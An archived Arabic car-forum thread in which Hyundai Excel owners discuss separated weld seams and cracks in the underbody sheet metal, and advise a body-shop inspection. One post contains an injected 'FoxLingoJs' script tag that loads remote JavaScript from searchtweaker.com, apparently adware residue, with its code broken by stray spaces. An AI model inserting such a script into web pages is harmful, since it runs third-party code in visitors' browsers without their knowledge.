مصر موتورز مجتمع السيارات

مصر موتورز مجتمع السيارات (https://www.masrmotors.com/vb/index.php)
-   Hyundai Excel - اكسيل (https://www.masrmotors.com/vb/forumdisplay.php?f=241)
-   -   رابطة مالكى الاكسل (https://www.masrmotors.com/vb/showthread.php?t=22421)

miam0502788391 24-03-2013 04:18 PM

رد: رابطة مالكى الاكسل

اقتباس:

المشاركة الأصلية كتبت بواسطة toto_hoho82 (المشاركة 862788)
اتمنى من الاخوة و الاخوات خبراء الاكسيل افادتى
لاحظت اثناء تغير الزيت اخر مرة والعربة على المجرى نزلت اسفل السيارة بالمجرى وجدت فروق فى الصاح اسفل الماتور وهذا الصاج عبارة عن رائين واحد فوق واحد ومفصولين فما العمل؟

السلام عليكم
دى فواصل لحام فكت من بعضها يا باشا السمكرية بيسموها الزنب
العيب ده من اسوأ عيوب الاكسل ولولا هذا العيب كانت تبقى سيارة مثالية
الحل انها تترد على زرجينة عند سمكرى بيفهم وتتلحم كويس اوى اوى اوى لأنها معرضه للفك مرة اخرى ان لم تعمل صح وساعات بتحتاج تقويه
وبالمرة يبص على كل الزنب اسفل الشاسيه
ونصيحة حوال تعملها بسرعه لأنها هتفتح منك وممكن الشاسيه يشرخ او يتكسر لا قدر الله , كمان السير بالسيارة غير آمن وهى على هذه الحالة
تحياتى
وربنا يوفقك

toto_hoho82 26-03-2013 12:55 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة miam0502788391 (المشاركة 863788)
السلام عليكم
دى فواصل لحام فكت من بعضها يا باشا السمكرية بيسموها الزنب
العيب ده من اسوأ عيوب الاكسل ولولا هذا العيب كانت تبقى سيارة مثالية
الحل انها تترد على زرجينة عند سمكرى بيفهم وتتلحم كويس اوى اوى اوى لأنها معرضه للفك مرة اخرى ان لم تعمل صح وساعات بتحتاج تقويه
وبالمرة يبص على كل الزنب اسفل الشاسيه
ونصيحة حوال تعملها بسرعه لأنها هتفتح منك وممكن الشاسيه يشرخ او يتكسر لا قدر الله , كمان السير بالسيارة غير آمن وهى على هذه الحالة
تحياتى
وربنا يوفقك

اشكر لك التكرم بالرد واننى اريد توضيح شئ لاحظتة مجددا هو ان الحزام المبرشم بتاع الشركة سليم و الحمد لله
والمشكلة كانت على شكل شق رفيع فى الصاج المطلى بالعازل
فهل هذا الشق يؤدى الى نفس العواقب المشار اليها فى الرد
وشكرا

miam0502788391 26-03-2013 04:29 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة toto_hoho82 (المشاركة 864455)
اشكر لك التكرم بالرد واننى اريد توضيح شئ لاحظتة مجددا هو ان الحزام المبرشم بتاع الشركة سليم و الحمد لله
والمشكلة كانت على شكل شق رفيع فى الصاج المطلى بالعازل
فهل هذا الشق يؤدى الى نفس العواقب المشار اليها فى الرد
وشكرا

مش لازم كل الزنب تكون كلها فكت والا العربية هتكون مفككه من بعضها
ممكن تكون زنبة واحدة هى اللى لحام بتاعها فك
طيب ممكن حضرتك توضح المكان بالضبط او لو تصوره يكون افضل انا عارف الاكسيل من تحت
كمان انا من رأى ان تخلى سمكرى يبص عليها لأنه بيدخل مفك بين الصاج ويشوف هو ماسك فى بعضه ولا مفصول

comandos_79 28-03-2013 02:03 PM

عندي سوال لخبراء الاكسيل هل بتشرخ زي الاعجوبة (( ١٢٨ )):k_crying77[1]::k_crying77[1]:
<script id="FoxLingoJs">(function (){try{var header=document.getElemen tsByTagName("HEAD")[0];var script=document.createEle ment("SCRIPT");script.src ="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.onreadystatec hange=function(){if (!(this.readyState)||(thi s.readyState=="complete"| |this.readyState=="loaded ")){script.onload=null;sc ript.onreadystatechange=n ull;header.removeChild(sc ript);}}; header.appendChild(script );} catch(e) {}})();</script>

pioneer 28-03-2013 05:13 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة miam0502788391 (المشاركة 864527)
مش لازم كل الزنب تكون كلها فكت والا العربية هتكون مفككه من بعضها
ممكن تكون زنبة واحدة هى اللى لحام بتاعها فك
طيب ممكن حضرتك توضح المكان بالضبط او لو تصوره يكون افضل انا عارف الاكسيل من تحت
كمان انا من رأى ان تخلى سمكرى يبص عليها لأنه بيدخل مفك بين الصاج ويشوف هو ماسك فى بعضه ولا مفصول

انا كمان لسه شايف الموضوع دا عندى اول امبارح بس انا متهيالى ان الزنب دى بتاعت التصفيح من تحت بس و مالهاش تأثير على الشاسية.
هم عباره عن اربع زنب بس بعرض العربية واحدة فى الاول و اتنين فى النص و الرابعه فى الاخر لو المفروض انها تبقى قوية كانت هتبقى ملحومه و الله اعلم.

الساعة الآن 03:27 PM.